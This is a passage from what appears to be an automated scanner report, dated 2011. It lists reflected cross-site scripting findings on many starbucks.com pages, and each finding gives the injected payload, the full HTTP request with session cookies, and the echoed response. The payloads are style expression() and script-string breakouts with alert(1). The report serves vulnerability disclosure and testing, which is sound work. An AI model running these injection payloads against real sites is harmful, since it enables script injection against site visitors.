<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity/partner-networks?ae7f1"style="x:expression(alert(1))"dbb34cb95f4=1" />
...[SNIP]...

1.629. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/international-positions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab6ec"style="x:expression(alert(1))"95aa1e09f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/international-positions?ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:03 GMT
Connection: close
Content-Length: 36752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/international-positions?ab6ec"style="x:expression(alert(1))"95aa1e09f92=1" />
...[SNIP]...

1.630. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 587cf"style="x:expression(alert(1))"c23cb73b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/working-at-starbucks?587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:37 GMT
Connection: close
Content-Length: 43842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/working-at-starbucks?587cf"style="x:expression(alert(1))"c23cb73b348=1" />
...[SNIP]...

1.631. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 287e3"%3balert(1)//6be60617140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 287e3";alert(1)//6be60617140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/working-at-starbucks?287e3"%3balert(1)//6be60617140=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:39 GMT
Connection: close
Content-Length: 43747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "651624292001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/working-at-starbucks?287e3";alert(1)//6be60617140=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.632. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25c37"%3balert(1)//2d0969caa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25c37";alert(1)//2d0969caa59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee?25c37"%3balert(1)//2d0969caa59=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:19 GMT
Connection: close
Content-Length: 55993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
type="text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "89759525001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee?25c37";alert(1)//2d0969caa59=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.633. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be1ba"style="x:expression(alert(1))"2e68e935a83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:15 GMT
Connection: close
Content-Length: 56088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?be1ba"style="x:expression(alert(1))"2e68e935a83=1" />
...[SNIP]...

1.634. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14736"style%3d"x%3aexpression(alert(1))"c3b68698284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14736"style="x:expression(alert(1))"c3b68698284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?14736"style%3d"x%3aexpression(alert(1))"c3b68698284=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:36 GMT
Connection: close
Content-Length: 37684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?14736"style="x:expression(alert(1))"c3b68698284=1" />
...[SNIP]...

1.635. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29816"style="x:expression(alert(1))"6d1aa7d73d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:45 GMT
Connection: close
Content-Length: 39129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?29816"style="x:expression(alert(1))"6d1aa7d73d1=1" />
...[SNIP]...

1.636. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70f3b"style="x:expression(alert(1))"df67647ac4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:57 GMT
Connection: close
Content-Length: 43949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?70f3b"style="x:expression(alert(1))"df67647ac4c=1" />
...[SNIP]...

1.637. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1318e"style="x:expression(alert(1))"b348d971bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:27 GMT
Connection: close
Content-Length: 50682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?1318e"style="x:expression(alert(1))"b348d971bc6=1" />
...[SNIP]...

1.638. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db288"style%3d"x%3aexpression(alert(1))"ffbed84d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db288"style="x:expression(alert(1))"ffbed84d709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?db288"style%3d"x%3aexpression(alert(1))"ffbed84d709=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:45 GMT
Connection: close
Content-Length: 41422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?db288"style="x:expression(alert(1))"ffbed84d709=1" />
...[SNIP]...

1.639. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68e89"style="x:expression(alert(1))"ef92fe52f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:24 GMT
Connection: close
Content-Length: 41464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?68e89"style="x:expression(alert(1))"ef92fe52f9f=1" />
...[SNIP]...

1.640. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4203"style="x:expression(alert(1))"93ec1632d62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:25 GMT
Connection: close
Content-Length: 40201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?d4203"style="x:expression(alert(1))"93ec1632d62=1" />
...[SNIP]...

1.641. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fd5c"style="x:expression(alert(1))"93089c0b9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:06 GMT
Connection: close
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?4fd5c"style="x:expression(alert(1))"93089c0b9ff=1" />
...[SNIP]...

1.642. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d779"style="x:expression(alert(1))"13c0978d7ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee?2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:24 GMT
Connection: close
Content-Length: 56951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?2d779"style="x:expression(alert(1))"13c0978d7ed=1" />
...[SNIP]...

1.643. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

